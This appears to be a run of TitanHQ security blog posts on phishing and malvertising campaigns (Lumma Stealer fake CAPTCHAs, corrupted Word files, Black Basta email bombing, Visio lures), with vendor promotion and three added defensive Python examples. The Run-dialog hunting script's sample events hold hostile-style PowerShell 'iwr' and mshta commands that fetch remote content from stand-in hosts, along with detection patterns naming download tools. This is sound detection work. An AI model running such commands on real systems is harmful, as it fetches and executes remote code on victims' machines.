It is important to have an advanced email security solution that is capable of detecting sophisticated phishing attacks that bypass the standard reputation checks that are present in virtually all spam filtering software – SPF, DKIM, and DMARC. Advanced spam filtering solutions incorporate AI and machine learning capabilities and can detect anomalies in inbound emails and flag them as suspicious or send them for deeper inspection in an email sandbox. In the sandbox, the message can be analyzed for malicious content, including following the link to check the destination URL. While this campaign does not use malware, an email filtering service with email sandboxing will also protect against malware threats.
Meeting invites, calendar invites, and collaboration requests are commonly used in phishing campaigns and are sent from trusted domains that often bypass spam filtering controls, so it is important to cover these types of scam emails in security awareness training. Employees should be made aware that these requests may not be what they seem, even if they have been sent via a legitimate service. Businesses can also gauge how susceptible employees are to these types of scams using a phishing simulator. SafeTitan includes many phishing templates involving invites from legitimate services to allow businesses to incorporate these into their simulations.
Call TitanHQ today for more information on improving your defenses against phishing with the SafeTitan security awareness training platform, SpamTitan email security, and the PhishTitan anti-phishing solution for Microsoft 365.
by titanadmin | Dec 27, 2024 | Internet Security |
An ongoing malvertising campaign is proving effective at distributing a dangerous information stealer malware called Lumma Stealer using fake CAPTCHA prompts that appear when users browse the web.
Lumma Stealer is offered under the malware-as-a-service model, where cybercriminals can pay to use the malware rather than having to develop their own. The malware has extensive stealing capabilities and will obtain browsing histories, passwords, and cryptocurrency wallet details. That information is then sent to the attacker’s command and control server and is abused directly or sold on. The fake CAPTCHA pages generated in this malvertising campaign will be familiar to web users, as they are present on many websites; even Google uses them to verify that a user is a human rather than a bot. In this case, the fake CAPTCHA uses images rather than text, which the user must click based on the prompt. The user is told to click on images of legitimate advertisements and, after selecting the advertisements and clicking verify, they will be tricked into executing a PowerShell command that will deliver Lumma Stealer from a remote server.
A variety of popup ads are used in this campaign to appeal to a broad audience, including streaming services, software sites, and fake offers, all designed to attract a click. Code embedded in the ad will perform a check to determine if the user is a person, and if that check is passed, the fake CAPTCHA is displayed. The CAPTCHA page includes JavaScript that silently copies a one-line PowerShell command to the clipboard.
As part of the verification check, the user will be presented with a Verification Steps pop-up that instructs them to press the Windows button + the R key, then press CTRL + V, and then press enter on their keyboard. Anyone with a reasonable knowledge of computers will be aware that the first step will launch the Windows Run Dialog box which is used to quickly run programs. CTRL + V is a keyboard shortcut for pasting, and enter will run that pasted command. Since JavaScript has added the PowerShell command to the clipboard, following those steps will run the PowerShell command and trigger the download and execution of Lumma Stealer.
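A command pasted into the Run dialog starts as a child of explorer.exe, which gives defenders a usable hunting signal. The following is an added example, not code from the original post or from the researchers: it filters process-creation events (Sysmon Event ID 1 field names) for script hosts started by explorer.exe whose command line fetches remote content or hides its window. The events, host names, and indicator patterns are constructed assumptions.

```python
import re

# Script hosts that a pasted one-liner typically starts (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line hints of a remote fetch, and of a hidden window or encoded command.
REMOTE_FETCH = re.compile(
    r"https?://|\b(?:iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod"
    r"|downloadstring|downloadfile)\b", re.I)
CONCEALMENT = re.compile(
    r"-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b|-e(?:nc(?:odedcommand)?)?\s", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"


def make_event(host, user, parent, image, command_line):
    return {"Computer": host, "User": user, "ParentImage": parent,
            "Image": image, "CommandLine": command_line}


# Constructed events; domains under .invalid/.example never resolve.
SAMPLE_EVENTS = [
    make_event("WS-014", "CORP\\alice", EXPLORER, PS,
               'powershell -w hidden -c "iwr https://cdn.example.invalid/verify.txt"'),
    make_event("WS-020", "CORP\\bob", EXPLORER, PS, '"' + PS + '"'),
    make_event("WS-022", "CORP\\carol", r"C:\Program Files\Microsoft VS Code\Code.exe",
               PS, "powershell -File build.ps1 -Uri https://intranet.corp.example/pkg"),
    make_event("WS-031", "CORP\\dave", EXPLORER, r"C:\Windows\System32\mshta.exe",
               "mshta https://files.example.invalid/check.hta"),
    make_event("WS-031", "CORP\\dave", EXPLORER, r"C:\Windows\System32\notepad.exe",
               "notepad.exe todo.txt"),
]


def image_name(path):
    """Lower-case file name from a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event):
    """Return the reasons an event looks like a pasted Run-dialog command."""
    if image_name(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if image_name(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    # explorer.exe is also the parent for shortcuts and Start-menu launches,
    # so the command line has to add evidence before anything is reported.
    reasons = []
    command_line = event.get("CommandLine", "")
    if REMOTE_FETCH.search(command_line):
        reasons.append("remote-fetch")
    if CONCEALMENT.search(command_line):
        reasons.append("hidden-or-encoded")
    return reasons


def find_pasted_run_commands(events):
    alerts = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            alerts.append({"host": event["Computer"], "user": event["User"],
                           "child": image_name(event["Image"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_pasted_run_commands(SAMPLE_EVENTS):
        print(alert)
```

On a flagged endpoint, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU can confirm what the user entered.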
Malvertising campaigns involve adding malicious adverts to third-party ad networks, which are used by a huge number of legitimate websites for generating additional revenue. Advertisers pay to have their adverts displayed on any website that has the ad network’s code. Many high-traffic legitimate sites such as media sites use these adverts, so the advertisers can reach a huge number of people. This campaign, which was analyzed by Guardio Labs/Infoblox, was linked to a single ad network – Monetag. The advantage of that ad network is it allows pop-ups to be displayed, and code can be incorporated to allow those pop-ups to be displayed even if the user has an ad blocker. All ad networks have moderation processes to verify that the ads being displayed are legitimate and not malicious; however, the threat actor has cleverly managed to circumvent moderation processes, thus ensuring their ads get millions of impressions.
Anyone browsing the web will have seen adverts displayed through ad networks, and avoiding these ads online is virtually impossible. As this campaign shows, even ad blockers are not always effective. To combat malvertising, businesses should ensure that they cover this tactic in their security awareness training content. Employees should be made aware of the threat and be told never to click on ads or popups, nor to execute any commands when prompted to do so on a website or by an ad.
Creating new training content is easy with the SafeTitan security awareness training platform from TitanHQ. The platform has a huge number of training modules, allowing businesses to easily create custom training programs for different roles, based on the types of threats they are likely to encounter, including malvertising threats.
A web filter is also strongly recommended for blocking access to malicious websites and controlling the sites that users can access, in particular sites offering pirated software as the ad networks used by these sites tend to have fewer controls on the advertisers that can use them, increasing the chance of malicious adverts being displayed.
by titanadmin | Dec 23, 2024 | Industry News, Spam Software |
TitanHQ’s email security solutions achieved first place in Q4 performance tests by the leading security information portal, testing, and certification body, VirusBulletin. The security engine that powers TitanHQ’s SpamTitan email security and PhishTitan anti-phishing platform for Microsoft 365 was put to the test alongside 10 other market-leading email security solutions and achieved the highest overall score out of all 11 solutions, building on the joint 1st overall score in the Q3, 2024 round of tests, 2nd position in the Q3 tests, and 3rd position in the Q1, 2024 tests.
The top position was achieved with a 100% phishing catch rate, a 100% malware catch rate, and a 0.00% false positive rate. This was the third consecutive quarter that TitanHQ’s solutions had a perfect score for catching malware and the third consecutive quarter that TitanHQ has been awarded the VBSpam+ award for outstanding performance. “We are thrilled to have significantly outperformed our main competitors and surpassed the industry average,” said TitanHQ CEO, Ronan Kavanagh. “Our unwavering commitment to providing unmatched email security is evident in these results, and we remain dedicated to protecting our clients from evolving cyber threats.”
Over the past two decades, VirusBulletin has tested, reviewed, and benchmarked enterprise-level security solutions to determine how effective the solutions are at blocking real-world threats. VirusBulletin has a formidable reputation for providing businesses with invaluable independent intelligence about the rapidly evolving threat landscape, and businesses look to performance tests when selecting security solutions to make sure they perform as well as the vendors claim. For the Q4, 2024 tests of enterprise-level anti-spam software, TitanHQ’s cloud-based anti-spam service was put to the test alongside solutions from Bitdefender, Fortinet, Mimecast, N-able, Sophos, Rspamd, SEPPmail, Net at Work, and Zoho. The tests ran for 16 days in November 2024 and included evaluations of almost 107,000 emails, of which 105,228 were spam and 1,315 were legitimate emails. 1,045 of the emails contained a malicious attachment and 16,825 contained a link to a web page hosting phishing content or malware.
Virus Bulletin Q4, 2024 Test Scores
Metric | TitanHQ Score
Malware catch rate | 100.000%
Phishing catch rate | 100.000%
Spam Catch (SC) rate | 99.999%
Project Honey Pot SC rate | 99.998%
MXMailData SC rate | 100.000%
Abusix SC rate | 99.999%
False Positive (FP) rate | 0.000%
Newsletters FP rate | 0.0%
Final Score | 99.999%
“With only two spam samples missed – one of which was from the unwanted category – no false positives of any kind, and a final score value of 99.999, SpamTitan showed the best performance in this test, ranking top for final score,” explained VirusBulletin. “Needless to say, a well-deserved VBSpam+ certification is awarded.”
Virus Bulletin 2024 Test Scores
Test Period | Phishing Catch Rate | Malware Catch Rate | Spam Catch Rate | Position
Q1 | 99.91% | 99.95% | 99.98% | 3rd
Q2 | 99.99% | 100% | 99.98% | 2nd
Q3 | 99.98% | 100% | 99.98% | 1st (Joint)
Q4 | 100% | 100% | 99.99% | 1st
The test results confirm that TitanHQ is a leading enterprise spam filter provider; however, TitanHQ’s spam filtering service and anti-phishing solution for M365 are suitable for use by businesses of all sizes. While incredibly powerful and feature-rich, they are easy to implement and use. The solutions have also been developed from the ground up to meet the needs of MSPs to help them better protect their clients from rapidly evolving threats. “We’ve seen a remarkable influx of new MSP customers migrating from other solutions, consistently highlighting TitanHQ’s ability to deliver immediate and substantial threat mitigation,” said Kavanagh.
If you want industry-leading email protection from spam, phishing, and malware, give the TitanHQ team a call today to find out more about getting started with SpamTitan and PhishTitan. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.
by titanadmin | Dec 18, 2024 | Industry News, Spam Software |
TitanHQ has announced that the latest version of SpamTitan (Skellig 9.07) has been launched, offering significant enhancements to improve detection, usability, and overall security. The new version of SpamTitan Skellig builds on previous versions that have been demonstrated to provide exceptional protection against malware, phishing, and spam, as evidenced by recent independent tests by VirusBulletin.
In Q3, 2024, SpamTitan achieved joint first place for overall score in the phishing, spam, and malware detection tests, and in Q4, 2024, performed even better, beating all other industry-leading competitors to achieve the top spot with an overall score of 99.999%, including a malware and phishing catch rate of 100%, a spam catch rate of 99.999%, and a false positive rate of 0.000%, earning SpamTitan its third consecutive VBSpam+ award.
The latest release of the SpamTitan Skellig engine includes numerous security updates, including significant improvements with enhanced Domain and Display Name anti-spoofing protection and updated anti-spoofing screens. The settings for Domain and Display Name anti-spoofing have been separated to make it easier to see which features have been enabled, and the update makes MSPs’ lives easier as these split options are available at the customer level, so there is no need to drill down to each domain-level setting. The update will reduce the time that needs to be spent managing security defenses. Further, the update provides greater flexibility and control for inbox protection, since Display Name anti-spoofing is independent of user policies. That means it is possible to upload a custom list of Display Name/email pairs for more targeted protection. To improve usability, changes have also been made under the hood for Quarantine Reports to ensure they are delivered more reliably and on time.
TitanHQ is committed to making continuous security improvements to improve detection and simplify security management to make its products easier and less time-consuming to use, ensuring users have complete control of how protections are applied. The new version will be updated automatically for current users, and if you are yet to try our spam filtering service, give the TitanHQ team a call today for help getting you started with a free trial.
by titanadmin | Dec 16, 2024 | Phishing & Email Spam |
A new phishing campaign has been identified that uses the novel tactic of attaching corrupted Microsoft Word files to emails. The files themselves do not contain any malicious code, so scans of the attachments by email security solutions may not flag the emails as malicious.
In order to get the recipient to open the email, the threat actor impersonates the HR department or payroll team, as employees will typically open these messages. The attached files have file names related to payments, annual benefits, and bonuses, which employees may open without performing standard checks of the email, such as identifying the true sender of the message. Many employees place a moderate amount of trust in Word files because, if a file contains a macro, the macro should not run automatically when the document is opened.
The threat actor relies on the employee’s curiosity to open the file and the way that operating systems handle corrupted files. The file recovery feature of Microsoft Word will attempt to recover corrupted files. The user will be informed that parts of the file contain unreadable content, and the user is prompted to confirm if they would like the file to be recovered. The documents have been crafted to ensure that they can be recovered by Word, and the recovery will present the user with a QR code that they are told they must scan to retrieve the document.
The document includes the logo of the company being targeted, and the user does not need to “enable editing” to view the contents of the document, so they may mistakenly believe they are safe. If they scan the QR code using their mobile device, they will be directed to a phishing page that is an exact match of the genuine Microsoft login prompt, where they are asked to enter their Microsoft credentials.
Businesses with spam filter software may not be protected as email security solutions often fail to scan corrupted files. For instance, the phishing emails bypass Outlook spam filters according to the researchers at Any.Run who identified the campaign. That means the emails may be delivered to inboxes, especially as the messages do not contain any content in the body of the email indicative of a phishing attempt.
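A scanner that cannot parse an attachment can treat that failure as a finding instead of passing the file through unscanned. The following is an added example, not code from the original post, from Any.Run, or from any TitanHQ product: it checks whether a .docx attachment is a readable OOXML ZIP package and quarantines it when it is not. How the campaign's files were damaged is not described above, so the two kinds of damage in the sample data are constructed assumptions.

```python
import io
import zipfile
import zlib

# Parts every Word package contains; used to tell a real .docx from any other ZIP.
REQUIRED_PARTS = {"[Content_Types].xml", "word/document.xml"}


def inspect_docx(data):
    """Classify the bytes of an attachment that claims to be a Word document."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as package:
            names = set(package.namelist())
            # testzip() reads every member and returns the first one whose
            # header or CRC-32 check fails, or None when all members are intact.
            damaged_member = package.testzip()
    except (zipfile.BadZipFile, zlib.error, EOFError, ValueError, NotImplementedError):
        return "damaged-container"
    if damaged_member is not None:
        return "damaged-member"
    if not REQUIRED_PARTS <= names:
        return "not-a-word-package"
    return "well-formed"


def attachment_action(filename, data):
    """Fail closed: a Word attachment that cannot be parsed is quarantined
    rather than delivered unscanned (assumed policy and action names)."""
    if not filename.lower().endswith((".docx", ".docm")):
        return "scan"
    state = inspect_docx(data)
    return "scan" if state == "well-formed" else "quarantine:" + state


def build_sample_docx():
    """Constructed minimal package, stored uncompressed with a fixed timestamp
    so the bytes are reproducible. It is not a complete Word document."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as package:
        for name, body in (
            ("[Content_Types].xml", "<Types/>"),
            ("word/document.xml", "<w:document>Q4 bonus schedule</w:document>"),
        ):
            info = zipfile.ZipInfo(name, date_time=(2024, 12, 16, 9, 0, 0))
            package.writestr(info, body)
    return buffer.getvalue()


if __name__ == "__main__":
    good = build_sample_docx()
    samples = {
        "intact": good,
        # End-of-central-directory record (last 22 bytes) removed.
        "truncated": good[:-22],
        # One stored byte altered, so the member's CRC-32 no longer matches.
        "altered": good.replace(b"bonus", b"b0nus", 1),
    }
    for label, blob in samples.items():
        print(label, "->", attachment_action("Annual_Bonus.docx", blob))
```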
If the user opens the file and scans the QR code, they will switch from their desktop or laptop to their mobile phone. Mobile devices rarely have the same level of security protection, so corporate anti-phishing controls such as web filters will likely be bypassed.
Threat actors are constantly developing new ways to trick employees in their phishing campaigns, which is why it is important to run security awareness training programs continuously, updating the training content with new training material in response to threat actors’ changing tactics. By warning employees about this method, they should recognize the scam for what it is if they receive an email with a corrupted file attachment. That is easy to do with a security awareness training platform such as SafeTitan. New training content can be quickly created and rolled out to all users as part of their monthly allocation of training modules. It is also easy to add this type of threat to the SafeTitan phishing simulator to test how employees respond to this new threat type.
As the researchers demonstrated, Microsoft fails to detect the threat, demonstrating why it is important to bolster your M365 phishing defenses with a third-party solution, such as PhishTitan from TitanHQ. PhishTitan integrates seamlessly with Microsoft 365 to augment protection and catches the phishing threats that Microsoft misses. PhishTitan will also add a banner to all inbound emails that come from external sources, giving users a clear flag that these emails are not genuine, since the HR department and payroll have internal email addresses.
An email security solution with email sandboxing is also advisable for deep inspection of file attachments, including the ability to read QR codes. Spam filters for incoming mail should also have machine learning and AI-based detection capabilities for identifying emails that deviate from the messages typically received by the business.
All of these features are part of TitanHQ’s email security suite. Give the team a call today to find out more.
by titanadmin | Dec 12, 2024 | Network Security, Security Awareness |
In this post, we explore some of the tactics used by the Black Basta ransomware group to gain initial access to victims’ networks. Black Basta is a ransomware-as-a-service (RaaS) group that first appeared in April 2022. After gaining access to victims’ networks, the group escalates privileges and moves laterally within the network, identifying sensitive data and exfiltrating files before running its encryption processes. The group then drops a ransomware note and demands payment to prevent the publication of the stolen data and to obtain the keys to decrypt the encrypted files. The group targets multiple industry sectors including healthcare organizations, primarily in North America, Europe, and Australia.
The group’s tactics are constantly evolving; however, one of the most common tactics used for initial access is email phishing, either by sending an email with a hyperlink to a malicious website or an infected email attachment. The group’s phishing campaigns aim to deliver Qakbot malware, which is used to provide persistent access to victims’ networks (via autorun entries and scheduled tasks), and for running PowerShell scripts to disable security solutions. The malware is then used to deliver additional malicious payloads such as Cobalt Strike, and legitimate software tools such as Splashtop, Mimikatz, and Screen Connect.
Recently, the group has been observed using a new tactic called email bombing as an alternative way of gaining initial access to networks. With email bombing, the selected targets’ email addresses are sent large volumes of spam emails, often by signing the user up to multiple mailing lists or spamming services simultaneously. After receiving a large volume of spam emails, the user is prepared for the next stage of the attack.
The threat actor reaches out to the user, often via Microsoft Teams or over the phone, and impersonates a member of the IT help desk. The threat actor claims they have identified a problem with spam email and tells the user that they need to download a remote management tool to resolve the issue.
If the user agrees, they are talked through downloading one of several tools such as QuickAssist, AnyDesk, TeamViewer, or ScreenConnect. The threat actor then uses that tool to remotely access the user’s device. These tools may be downloaded directly from the legitimate vendor’s domain; however, since many businesses have controls in place to prevent the installation of unauthorized remote access tools, the installation executable file may be downloaded from SharePoint. Once installed, the threat actor will use the remote access to deliver a range of payloads.
Email bombing is a highly effective tactic as it creates a need to have an issue resolved. Once on the phone or in conversation via Microsoft Teams, the threat actor is able to try other methods for installing the remote access tools if they fail due to the user’s security settings.
Email bombing may be used by multiple threat actors for initial access, and phishing remains the most common method for gaining a foothold in networks for follow-on attacks. Implementing defenses against these tactics will significantly improve your defenses and make it harder for threat actors to breach your network.
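An email bomb is visible in mail logs before the follow-up call arrives, which gives the help desk a chance to warn the user first. The following is an added example, not code from the original post: it slides a time window over inbound mail per recipient and alerts when both message volume and sender-domain diversity spike, so a burst from a single legitimate system is not flagged. The log tuples, addresses, and thresholds are constructed assumptions to be tuned against real baselines.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def detect_email_bombing(events, window=timedelta(minutes=10),
                         min_messages=40, min_domains=25):
    """events: iterable of (timestamp, recipient, sender_address) in any order.
    Returns {recipient: {"window_start", "peak_messages", "peak_domains"}}."""
    recent = defaultdict(deque)   # recipient -> (timestamp, sender domain) in window
    alerts = {}
    for ts, recipient, sender in sorted(events):
        recipient = recipient.lower()
        queue = recent[recipient]
        queue.append((ts, sender.rpartition("@")[2].lower()))
        # Drop messages that have aged out of the window.
        while ts - queue[0][0] > window:
            queue.popleft()
        # Recomputed per message for clarity; keep a counter for large volumes.
        domains = {domain for _, domain in queue}
        if len(queue) >= min_messages and len(domains) >= min_domains:
            alert = alerts.setdefault(recipient, {
                "window_start": queue[0][0],
                "peak_messages": 0,
                "peak_domains": 0,
            })
            alert["peak_messages"] = max(alert["peak_messages"], len(queue))
            alert["peak_domains"] = max(alert["peak_domains"], len(domains))
    return alerts


def build_sample_events():
    """Constructed inbound-mail log for three recipients."""
    start = datetime(2024, 12, 12, 9, 0, 0)
    events = []
    # Flood: 60 mailing-list confirmations in under 8 minutes, each from a
    # different domain, as happens when an address is signed up to many lists.
    for i in range(60):
        events.append((start + timedelta(seconds=8 * i),
                       "alice@corp.example", f"noreply@list{i}.example"))
    # Busy but normal: 50 ticket notifications in 5 minutes from one vendor.
    for i in range(50):
        events.append((start + timedelta(seconds=6 * i),
                       "carol@corp.example", "tickets@vendor.example"))
    # Ordinary traffic: five messages spread over several hours.
    for i in range(5):
        events.append((start + timedelta(hours=i),
                       "bob@corp.example", f"peer{i % 2}@partner.example"))
    return events


if __name__ == "__main__":
    for recipient, alert in detect_email_bombing(build_sample_events()).items():
        print(recipient, alert)
```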
An Advanced Spam Filter
An advanced spam filter is a must, as it can identify and block phishing attempts and reduce the effectiveness of email bombing. Next-gen spam filtering software incorporates AI and machine learning algorithms to thoroughly assess inbound emails, checking how they deviate from the emails typically received by the business, and helping to flag anomalies that could indicate novel phishing attempts.
A spam filter should also incorporate email sandboxing in addition to antivirus software protection, as the latter can only detect known threats. Novel malware variants and obfuscated malware are often missed by antivirus software, so a sandbox is key to blocking malware threats. After passing initial checks, an email is sent to the email sandboxing service for deep analysis, where behavior is checked for malicious actions, such as attempted C2 communications and malware downloads.
SpamTitan incorporates machine learning algorithms, sandboxing, and link scanning to provide advanced protection against phishing and malware attacks. SpamTitan was rated the most effective spam filter in recent independent tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.99% of spam emails, giving the solution the highest overall score out of all 11 spam filtering services put to the test.
Security Awareness Training
It is important to provide regular security awareness training to the workforce, including all employees and the C-suite. The most effective training is provided regularly in small chunks, building up knowledge of threats and reinforcing security best practices. This is easiest with a modular computer-based training course. When new tactics such as email bombing are identified, they can be easily incorporated into the training course and rolled out to end users to improve awareness of specific tactics. Also consider running phishing simulations, as these have been shown to be highly effective at reinforcing training and identifying knowledge gaps that can be addressed through further training.
TitanHQ makes this as easy as possible with the SafeTitan security awareness training and phishing simulation platform. The platform includes hundreds of engaging and enjoyable training modules covering all aspects of security and threats employees need to be aware of, while the phishing simulation platform makes it easy to create and automate internal phishing simulations, which automatically trigger relevant training content if the user fails the simulation.
Give the TitanHQ team a call today for further information on SpamTitan and SafeTitan, for a product demonstration, or to arrange a free trial.
by titanadmin | Nov 30, 2024 | Internet Security, Phishing & Email Spam |
Holiday season officially started the day after Thanksgiving in the United States, or Black Friday as it is now known. Taking its name from a term used by police officers in Philadelphia to describe the chaos in the city caused by the deluge of suburban shoppers heading to the city to do their holiday shopping, it has become a day when retailers offer bargains to entice the public to buy their goods and services. While the jury is still out on how good many of those bargains are, the consensus is that there are bargains to be found in stores and online, with the official day for the latter being the Monday after Black Friday – Cyber Monday.
The holiday season for shoppers is boom time for cybercriminals who take advantage of the increase in online shoppers looking to buy gifts for Christmas and pick up a bargain or two. Many people time major purchases to take advantage of Black Friday and Cyber Monday offers and cybercriminals are poised to pounce on the unwary. The losses to scams over the holiday period are staggering. According to the Federal Bureau of Investigation (FBI), more than $73 million was lost to holiday season scams in 2022; however, the true total is likely to be considerably higher since many losses go unreported. Those figures do not include the losses to phishing, malware, ransomware, BEC attacks, and other cyberattacks that occur over the holiday period, such as the surge in ransomware attacks over Thanksgiving weekend and Christmas when IT staff are spread thin.
Given the heightened risk of scams and cyberattacks over the holiday season, consumers should be on their guard, take extra care online, ensure that vendors are legitimate before handing over their card details, and double-check the legitimacy of any email requests. While consumers face elevated risks during the holiday season, so do businesses. There are end-of-year deadlines to meet and it’s a short month with many workers taking annual leave over Christmas and the New Year. As the year draws to a close it is common for vigilance to slip, and threat actors are ready to take advantage. Businesses need to ensure that their defenses are up to scratch, especially against phishing – the most common initial access vector in cyberattacks – as a slip in vigilance can easily lead to a costly cyberattack.
Businesses can take several proactive steps to ensure they are protected against holiday season cyber threats, and conducting a security awareness training session is a good place to start. Employees should be reminded about the increase in malicious cyber activity over the holiday period and be reminded about the risks they may encounter online, via email, SMS, instant messaging services, and the phone. With TitanHQ’s SafeTitan security awareness training platform, it is easy to spin up training courses for employees to remind them to be vigilant and warn them about seasonal and other cyber threats. The training platform makes it quick and easy to create and automate training courses, with the training delivered in modules of no more than 10 minutes to ensure employees can maintain concentration and fit the training into their workflows. The SafeTitan platform also incorporates a phishing simulator, which businesses can use to reinforce training and identify individuals who are fooled by phishing scams and ensure they receive the additional training they need.
Due to the high risk of phishing attacks, it is a good idea to implement an advanced spam filter service, one that reliably identifies and neutralizes phishing and business email compromise attempts and provides cutting-edge protection against malware. You need look no further than SpamTitan for that protection. SpamTitan incorporates machine learning and AI-based detection capabilities for detecting phishing, BEC, and scam emails, and dual antivirus engines and email sandboxing for detecting malware threats, including novel malware variants. In Q3, VirusBulletin’s tests of SpamTitan confirmed a phishing detection rate of 99.99% and a malware catch rate of 99.511%. The interim figures for November 2024 are a 100% phishing catch rate and a 100% malware catch rate, demonstrating the reliability of TitanHQ’s cloud-based email filtering solution.
TitanHQ also offers online protection through the WebTitan DNS filter, which prevents access to known malicious websites, blocks malware downloads from the Internet, and can be used to control the web content employees can access, providing an important extra layer of security against web-based threats. At TitanHQ we hope you have a happy holiday period and above all else that you are well protected against cyber threats. Give the team a call today to find out more about how we can help protect your business this holiday season and beyond.
by titanadmin | Nov 30, 2024 | Phishing & Email Spam |
A phishing campaign has been identified that targets law firms by impersonating U.S. federal courts and purports to contain an electronic notice of court filings. Like many similar campaigns in recent months, the campaign aims to trick law firm employees into downloading malware that provides the threat actor with persistent access to the law firm’s network.
Threat actors often target businesses, but a far more effective use of their time and resources is to target vendors. If a threat actor gains access to a vendor’s network, they can potentially use the vendor’s privileged access to attack all downstream clients. Even when a vendor does not have privileged access to client networks, they are likely to store large amounts of data from multiple clients. In the case of law firms, that data is highly sensitive and easily monetized. It can be easily sold on darknet marketplaces and be used as leverage to extort the law firm and its clients.
Over the last few years, law firms have been extensively targeted by threat actors for this very reason. According to a 2023 report from the UK’s National Cyber Security Centre, 65% of law firms have been a victim of a cyber incident and a 2024 report from the chartered accountancy firm Lubbock Fine indicates cyberattacks on law firms have increased by 77% year-over-year. The main motivations for these attacks are extortion and ransomware. There has also been a surge in business email compromise (BEC) attacks on law firms, as they are typically involved in large financial transactions that threat actors can try to divert to their own accounts.
One of the latest campaigns seeks persistent access to the networks of law firms by tricking the firms into installing malware. The campaign came to light following multiple complaints about fake notices of electronic court filings, which prompted the U.S. federal judiciary to issue a warning to U.S. lawyers to be alert to email notifications that purport to be notifications from the courts. The emails impersonate the PACER case management and electronic case files system, and instruct the recipient to respond immediately. The judiciary advised law firms to always check the federal judiciary’s official electronic filing system and never open attachments in emails or download files from unofficial sources.
The intercepted emails impersonate lower courts and prompt the recipient to click an embedded hyperlink to access a document from a cloud-based repository. Clicking the link directs the user to a malicious website where they are prompted to download a file. Opening the file triggers the installation of malware that will give the threat actor the access they need for an extensive compromise. The campaign will undoubtedly result in the theft of sensitive data and attempted extortion.
Most law firms will be well aware that they are prime targets for threat actors and the importance of implementing robust cybersecurity defenses. Since phishing is the most common way that threat actors get access to their networks and sensitive data, it is vital for law firms to ensure that they have an effective email security solution – one that is capable of detecting and blocking malware and correctly classifying phishing and BEC emails. This is an area where TitanHQ can help. TitanHQ offers a suite of cutting-edge cybersecurity solutions that provide multiple layers of protection against the most common attack vectors.
The primary defense against phishing and BEC attacks is anti-spam software, which TitanHQ can provide as a cloud-based anti-spam service or virtual anti-spam appliance that can be installed on-premises on existing hardware. The SpamTitan solution incorporates dual anti-virus engines and email sandboxing for detecting malware and malicious code in email attachments, even zero-day malware threats. The solution has machine learning capabilities for detecting novel email threats such as phishing and BEC attacks that are needed to detect and block the latest AI-generated threats. In independent tests by Virus Bulletin in November 2024 on 125,000 emails, SpamTitan had a 100% malware and phishing catch rate and only miscategorized 2 benign spam emails.
It is also important to ensure that all lawyers and support staff are made aware of the latest threats and receive regular cybersecurity awareness training. TitanHQ offers a comprehensive security awareness training platform (SafeTitan) and phishing simulator that makes it easy to create effective, ongoing training programs that incorporate training material on the latest threats. Give the TitanHQ team a call today for more information on these and other cybersecurity solutions and for advice on improving your cybersecurity defenses against the most common attack vectors.
by titanadmin | Nov 29, 2024 | Phishing & Email Spam |
A new phishing scam uses Microsoft Visio files to bypass phishing defenses to steal Microsoft 365 credentials. Microsoft Visio is a diagramming and vector graphics application used to create a variety of diagrams, including building plans, data flow diagrams, organizational charts, and flowcharts. While the software is widely used by businesses, Visio files are unlikely to feature heavily in security awareness training courses as they are not commonly used in phishing campaigns or for malware delivery. Security awareness training tends to focus on the most common file types such as documents, spreadsheets, and executable files. Unfamiliarity with the file type should mean employees exercise extreme caution; however, since Visio is part of the Microsoft 365 family, the files may be trusted and opened.
To increase the chance of that, this campaign uses compromised accounts to send the phishing emails. By using trusted accounts there is less chance of the emails being identified by email security solutions as malicious since emails are likely to pass reputation and authentication checks. It also increases the chance of emails being opened, as employees are trained to be suspicious of emails from unknown senders and generally trust emails from known senders. Like countless other phishing campaigns, tried and tested lures are used to get the recipient to open the attached .vsdx file. In this campaign the phishing emails masquerade as a purchase order and business proposals. Also observed in this campaign is the use of an Outlook message attachment, with that message including the malicious Visio file. Some emails use hyperlinks instead which direct the recipient to a SharePoint page hosting the Visio file. The latter helps to ensure that the email message is not blocked by email security solutions, which typically trust SharePoint URLs.
If the Visio file is opened, the user will be presented with branding that makes the file appear legitimate and they are advised to click an embedded link to view the contents of the file. The user is told to hold down the CTRL key when they click the link – an additional measure for evading security solutions. That link directs the user to a URL that hosts a spoofed login page that prompts them to enter their Microsoft credentials, which are captured by the threat actor.
While the use of Visio files for phishing is not common, there has been an increase in the use of these files as threat actors look for more reliable methods of phishing. It is certainly worthwhile ensuring that these file types are covered in your security awareness training programs and phishing simulations. While it is important to train employees to be aware of the latest tactics, techniques, and procedures used by threat actors to steal credentials, having an advanced email security solution in place can ensure that these malicious emails do not reach their targets. One of the easiest ways to block the threat, given that these are not commonly used files, is to configure your spam filter to block/quarantine emails containing .vsdx attachments, and certainly to do so for users who do not need to use these file types for work purposes. This is straightforward with SpamTitan (see our Help section).
If it is not practical to block these file types, SpamTitan does incorporate a variety of safeguards for preventing the delivery of malicious messages, including email sandboxing for deep analysis of file attachments to identify malicious URLs (and malware) and machine learning to identify emails that deviate from the messages typically received by the user/business. These features are critical, since the messages in this campaign are sent from compromised email accounts that are potentially trusted.
If you are not a SpamTitan user, give the TitanHQ team a call to find out more about the solution and why so many businesses are switching to SpamTitan for email security and check out this post, which highlights SpamTitan’s 100% malware and phishing block rate in recent tests.
by titanadmin | Nov 29, 2024 | Phishing & Email Spam |
Cybercriminals are increasingly leveraging SVG files in their email campaigns. These file attachments have been used as part of convincing campaigns that have fooled many end users into disclosing their credentials or installing malware.
